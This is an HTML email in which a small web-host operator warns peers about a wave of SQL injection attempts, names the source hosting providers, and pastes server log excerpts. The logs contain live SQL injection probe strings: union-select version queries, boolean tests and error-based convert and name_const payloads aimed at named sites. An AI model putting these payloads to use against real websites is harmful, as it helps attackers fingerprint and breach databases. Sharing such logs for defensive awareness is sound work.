
<html>

  <head>


    <meta http-equiv="content-type" content="text/html; charset=UTF-8">

  </head>

  <body>

    <p><font face="Calibri">Hey HT web hosts out there,</font></p>

    <p><font face="Calibri">Due to recent hacking attempts against our

        servers, I have installed an IP Tracker that tracks and blocks

        any aggressive activity.</font></p>

    <p><font face="Calibri">Starting late last week we've found a

        growing number of IP numbers that appear to be attempting SQL

        Injection attacks. I've pasted a few snippets from our logs,

        below.</font></p>

    <p><font face="Calibri">Anyone else seeing this kind of activity on

        their servers? Every time I block an IP number they move to

        another IP number. The list of IPs hitting us is growing, and

        moving across multiple hosts.<br>

      </font></p>

    <p><font face="Calibri">So far, I've contacted four different server

        hosts about the traffic coming from their servers. By far the

        most "infected" appears to be the Unified Layer family of

        hosting companies, which includes HostGator Mexico, webhostbox

        Bigrock India, and a number of others. Additional sources of the

        attacks are Hetzner.com from Germany; Ozkula from Turkey; and

        ColoCrossing from Buffalo NY. I'm sure more will be added as the

        days go on.<br>

      </font></p>

    <p><font face="Calibri">Stay safe.</font></p>

    <p><font face="Calibri">Mik<br>

      </font></p>

    <pre class="moz-signature" cols="72"><font size="-2"><font face="Courier New, Courier, monospace">94.130.76.249   13:38:44        fitzgerald-realestate.com       term=0 /%2f**%2fcOnVeRt(int%2c(char(33)%2bchar(126)%2bchar(33)%2b(char(65)%2bchar(66)%2bchar(67)%2bchar(49)%2bchar(52)%2bchar(53)%2bchar(90)%2bchar(81)%2bchar(54)%2bchar(50)%2bchar(68)%2bchar(87)%2bchar(81)%2bchar(65)%2bchar(70)%2bchar(80)%2bchar(79)%2bchar(73)%2bchar(89)%2bchar(67)%2bchar(70)%2bchar(68))%2bchar(33)%2bchar(126)%2bchar(33)))

94.130.76.249   13:38:45        fitzgerald-realestate.com       term=0' /z'0=A

94.130.76.249   13:38:47        fitzgerald-realestate.com       /z term=%2f**%2fcOnVeRt(int%2c(char(33)%2bchar(126)%2bchar(33)%2b(char(65)%2bchar(66)%2bchar(67)%2bchar(49)%2bchar(52)%2bchar(53)%2bchar(90)%2bchar(81)%2bchar(54)%2bchar(50)%2bchar(68)%2bchar(87)%2bchar(81)%2bchar(65)%2bchar(70)%2bchar(80)%2bchar(79)%2bchar(73)%2bchar(89)%2bchar(67)%2bchar(70)%2bchar(68))%2bchar(33)%2bchar(126)%2bchar(33)))

94.130.76.249   13:38:59        fitzgerald-realestate.com       /z term=0%20AND%201=1

94.130.76.249   13:39:01        fitzgerald-realestate.com       /z term=0999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1

94.130.76.249   13:39:03        fitzgerald-realestate.com       /z term=099999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x

94.130.76.249   13:39:04        fitzgerald-realestate.com       /z term=099999%22%20union%20select%20unhex(hex(version()))%20--%20%22x%22=%22x

94.130.76.249   13:39:06        fitzgerald-realestate.com       /z term=0%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20and%201%3D1

94.130.76.249   13:39:07        fitzgerald-realestate.com       /z term=0%27%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20%27x%27=%27x

94.130.76.249   13:39:09        fitzgerald-realestate.com       /z term=0%22%20or%20(1,2)=(select*from(select%20name_const(CHAR(111,108,111,108,111,115,104,101,114),1),name_const(CHAR(111,108,111,108,111,115,104,101,114),1))a)%20--%20%22x%22=%22x

</font></font></pre>

    <p><br>

    </p>

    <pre class="moz-signature" cols="72"><font size="-2"><font face="Courier New, Courier, monospace">37.247.110.108  08:14:38        Greenfield-MA.gov                       /z term=Licensing%20AND%201=1

37.247.110.108  08:14:42        Greenfield-MA.gov                       /z term=Licensing999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1

37.247.110.108  08:14:44        Greenfield-MA.gov                       /z term=Licensing99999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x

37.247.110.108  08:14:46        Greenfield-MA.gov                       /z term=Licensing99999%22%20union%20select%20unhex(hex(version()))%20--%20%22x%22=%22x

</font></font></pre>

    <p><font face="Calibri"></font><br>

    </p>

    <pre class="moz-signature" cols="72"><font face="Courier New, Courier, monospace"><font size="-1">192.3.204.226   14:58:55        Greenfield-MA.gov                       /z term=Licensing

192.3.204.226   14:58:56        Greenfield-MA.gov                       /z term=Licensing2121121121212/1

192.3.204.226   14:58:57        Greenfield-MA.gov                       /z term=Licensing%20AND%201=1

192.3.204.226   14:58:59        Greenfield-MA.gov                       /z term=Licensing999999/1%20union%20select%20unhex(hex(version()))%20--%20and%201%3D1

192.3.204.226   14:59:00        Greenfield-MA.gov                       /z term=Licensing99999%27%20union%20select%20unhex(hex(version()))%20--%20%27x%27=%27x


</font> </font></pre>

    <pre class="moz-signature" cols="72">-- 

---

Mik Muller, president

Montague WebWorks

239-R Main Street, Greenfield, MA

413-320-5336

<a class="moz-txt-link-freetext" href="http://MontagueWebWorks.com">http://MontagueWebWorks.com</a>

Powered by ROCKETFUSION</pre>

  </body>

</html>